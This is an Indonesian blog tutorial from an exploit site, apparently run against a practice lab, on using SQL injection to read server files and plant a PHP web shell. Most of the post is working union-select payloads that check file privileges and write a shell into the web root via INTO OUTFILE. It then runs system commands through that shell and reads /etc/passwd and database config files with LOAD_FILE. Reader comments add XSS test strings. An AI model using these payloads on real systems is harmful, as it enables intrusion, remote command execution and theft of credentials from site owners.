• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial SQL Injection Load File dan Into Outfile

August 5, 2019 by Jack Wilder 12 Comments

Tutorial SQL Injection Load File dan Into Outfile. Selain untuk melihat isi dari database target, SQL injection bisa dieksplorasi lebih jauh, misalnya untuk melihat file di web server, ataupun untuk menambahkan file di webserver. Ya tentu saja kita harus punya privilege yang cukup.

Saya anggap kalian sudah membaca artikel saya tentang SQL Injection manual. Sehingga disini saya langsung skip ke injeksi setelah menemukan magic number. Anggap disini saya menggunakan nomor ajaib 2.

Step 1 – Memeriksa Hak Akses

Disini kita harus melihat terlebih dahulu user database yang digunakan.

  • 1337′ union select 1,user(),3,4,5#

root@localhost. Bagus, user root. Kita bisa konfirmasi sekali lagi dengan query untuk mengecek file_priv.

  • 1337′ union select 1,group_concat(user,0x3a,file_priv),3,4,5 FROM mysql.user#

Step 2 – Eksekusi Into Outfile

Untuk eksekusi query into outfile, kita harus tau path dimana web target tersebut berada. Kita bisa cek dari error yang ditampilkan.

Terlihat path error nya ada di /usr/share/nginx/evillabs/SQLi/Himameka2019/ .

Query into outfile nya

  • 1337′ union select 1,”<?php var_dump($_GET[‘a’]($_GET[‘b’])); ?>“,3,4,5 into outfile “/usr/share/nginx/evillabs/SQLi/Himameka2019/exp.php” #

Disini file barunya saya beri nama exp.php .

Muncul error? Tidak masalah. Sekarang langsung kita akses path shell nya.

  • https://labs.evil-security.com/SQLi/Himameka2019/exp.php

Eksekusi shell nya

  • https://labs.evil-security.com/SQLi/Himameka2019/exp.php?a=system&b=ls%20-lha

Oke. Kalian berhasil mengupload shell ke web target menggunakan query into outfile. Langkah ini lebih praktis daripada kita harus melakukan cracking password user ataupun susah susah mencari halaman login yang entah ketemu entah tidak.

Step 3 – Eksekusi Load File

Selain untuk menambahkan file ke web target, SQL injection juga bisa digunakan untuk melihat isi dari file yang ada di web target tersebut. Ya tentunya langkah ini tidak diperlukan lagi jika kalian sudah berhasil mengupload shell ke web target. Namun tidak ada salahnya kalian untuk tau.

Memeriksa isi /etc/passwd

  • 1337′ union select 1,load_file(“/etc/passwd“),3,4,5#

Memeriksa file config database.

Pertama, kita periksa file yang menunjukkan pesan error, yang dalam hal ini adalah file index.php.

  • 1337′ union select 1,load_file(“/usr/share/nginx/evillabs/SQLi/Himameka2019/index.php“),3,4,5#

Sekarang kita tau bahwa config database nya ada di file database.php .

  • 1337′ union select 1,load_file(“/usr/share/nginx/evillabs/SQLi/Himameka2019/database.php“),3,4,5#

 

Baiklah mungkin itu saja tutorial kali ini, semoga bermanfaat. Jika ada yang ingin ditanyakan silahkan tinggalkan komentar.

 

Shares

Filed Under: SQL Injection

Reader Interactions

Comments

  1. jsdjdn says

    August 11, 2019 at 12:24 am

    gans%22;}alert(%22Gans%22);function%20x(){//

    Reply
  2. "> . says

    May 13, 2020 at 6:25 am

    “>x

    Reply
  3. "> says

    June 15, 2020 at 8:27 am

    U

    Reply
  4. test says

    October 9, 2020 at 8:38 am

    test

    Reply
  5. Tes says

    October 14, 2020 at 11:20 pm

    gans%22;}alert(%22Gans%22);function%20x(){//

    Reply
  6. Kntl says

    December 20, 2020 at 9:58 pm

    “onclick=alert(1)>

    Reply
  7. Siapa? says

    March 26, 2021 at 7:32 pm

    Pada sok sok coba xss disini kwkwk

    Reply
  8. yanto says

    April 21, 2021 at 1:59 pm

    stress

    Reply
  9. J says

    June 22, 2021 at 5:16 am

    “>

    Reply
  10. Awokwokwokwok says

    September 28, 2021 at 11:31 pm

    “>

    Reply
  11. MEKEK says

    January 18, 2022 at 2:11 pm

    Woy

    Reply
  12. Xixixi says

    November 22, 2022 at 10:01 pm

    Banyak amat yg nyoba xss di sini

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

WordPress Plugin CopySafe PDF Protection Shell Upload

Mass Deface setelah Rooting Server

Deface dengan Metode Timthumb Remote Code Execution

FastMail Custom Domain or Subdomain Takeover

Reverse Shell From Local File Inclusion Exploit

Azure Traffic Manager Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Readme.io Custom Domain or Subdomain Takeover

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

FCKeditor Bypass Shell Upload With Burp Suite Intercept

LinuxSec / 74 queries in 0.12 seconds